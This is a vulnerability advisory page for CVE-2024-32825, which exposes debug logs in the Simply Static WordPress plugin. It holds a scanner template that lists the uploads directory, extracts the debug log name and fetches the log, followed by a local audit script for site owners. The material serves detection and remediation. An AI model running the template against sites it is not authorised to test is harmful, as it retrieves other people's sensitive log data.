Simply Static - Information Disclosure
CVE-2024-32825
Verified
Description
Simply Static by Patrick Posner, in versions up to 3.1.3, inserts sensitive information into log files because of improper handling of log data. Attackers can potentially access that sensitive information, and exploitation requires no specific privileges.
Severity
Medium
Published Date
April 23, 2026
Template Author
pussycat0x
CVE-2024-32825.yaml
id: CVE-2024-32825

info:
  name: Simply Static - Information Disclosure
  author: pussycat0x
  severity: medium
  description: |
    Patrick Posner Simply Static versions up to 3.1.3 contain a vulnerability for insertion of sensitive information into log files caused by improper handling of log data, letting attackers potentially access sensitive information, exploit requires no specific privileges.
  impact: |
    Attackers can access sensitive information stored in log files, leading to information disclosure.
  remediation:
    Update to the latest version of Simply Static that addresses this issue, or apply available patches.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simply-static/simply-static-313-unauthenticated-information-exposure
    - https://www.cve.org/CVERecord?id=CVE-2024-32825
    - https://plugins.trac.wordpress.org/changeset/3025775/simply-static
  metadata:
    verified: true
    publicwww-query: "/wp-content/plugins/simply-static/"
  tags: cve,cve2024,wordpress,wp-plugin,simply-static

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/simply-static/"
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Index of", "debug.txt")'
        condition: and
        internal: true
    extractors:
      - type: regex
        name: debug_file
        regex:
          - '([0-9a-z]+)\-debug\.txt'
        internal: true
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/simply-static/{{debug_file}}"
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, ".php")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100c0aa4db2bfcaa22fc8d0298ad61088b9a61e334ffe8356db0d70139316fd312d02200bdadada3fc8daeddb3e1467bbcc3544acb1bebec120827f285f8c23cf5569fc:922c64590222798bb761d5b6d8e72950
Remediation Steps
Update to the latest version of Simply Static that addresses this issue, or apply available patches.
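
For site owners checking their own installation, the sketch below applies the template's two conditions to the local filesystem and compares the installed plugin version with 3.1.3. It is an added example, not part of the template or of Simply Static; the function names, the sample tree built in `demo()` and the reliance on the standard WordPress `Version:` plugin header are assumptions, and whether the web server actually serves the uploads directory still has to be checked separately.

```python
import re
import tempfile
from pathlib import Path

# Same file-name pattern as the template's regex extractor.
DEBUG_RE = re.compile(r"^[0-9a-z]+-debug\.txt$")
# "versions up to 3.1.3" per the description above.
LAST_AFFECTED = (3, 1, 3)

def plugin_version(wp_root):
    """Read the standard WordPress 'Version:' plugin header, or None."""
    plugin_dir = Path(wp_root) / "wp-content/plugins/simply-static"
    if not plugin_dir.is_dir():
        return None
    for php in sorted(plugin_dir.glob("*.php")):
        m = re.search(r"^[ \t/*#@]*Version:\s*([0-9.]+)",
                      php.read_text(errors="replace"), re.M)
        if m:
            return tuple(int(p) for p in m.group(1).split(".") if p)
    return None

def audit(wp_root):
    """Evaluate the template's two conditions on disk instead of over HTTP."""
    log_dir = Path(wp_root) / "wp-content/uploads/simply-static"
    logs = []
    if log_dir.is_dir():
        logs = [p for p in sorted(log_dir.iterdir()) if DEBUG_RE.match(p.name)]
    version = plugin_version(wp_root)
    return {
        "version": version,
        "affected_version": version is not None and version <= LAST_AFFECTED,
        "debug_logs": [p.name for p in logs],
        # Second matcher: the log body mentions ".php" (file paths in the log).
        "logs_with_php": [p.name for p in logs
                          if ".php" in p.read_text(errors="replace")],
    }

def demo():
    """Build a constructed WordPress tree (not real data) and audit it."""
    with tempfile.TemporaryDirectory() as root:
        plug = Path(root, "wp-content/plugins/simply-static")
        logs = Path(root, "wp-content/uploads/simply-static")
        plug.mkdir(parents=True)
        logs.mkdir(parents=True)
        (plug / "simply-static.php").write_text("<?php\n/**\n * Version: 3.1.3\n */\n")
        (logs / "0a1b2c3d-debug.txt").write_text("[constructed] wp-load.php included\n")
        (logs / "notes.txt").write_text("unrelated file\n")
        return audit(root)

if __name__ == "__main__":
    print(demo())
```

Debug logs that remain on disk after the plugin is updated are still reported by `audit()`, so review or delete them as part of remediation.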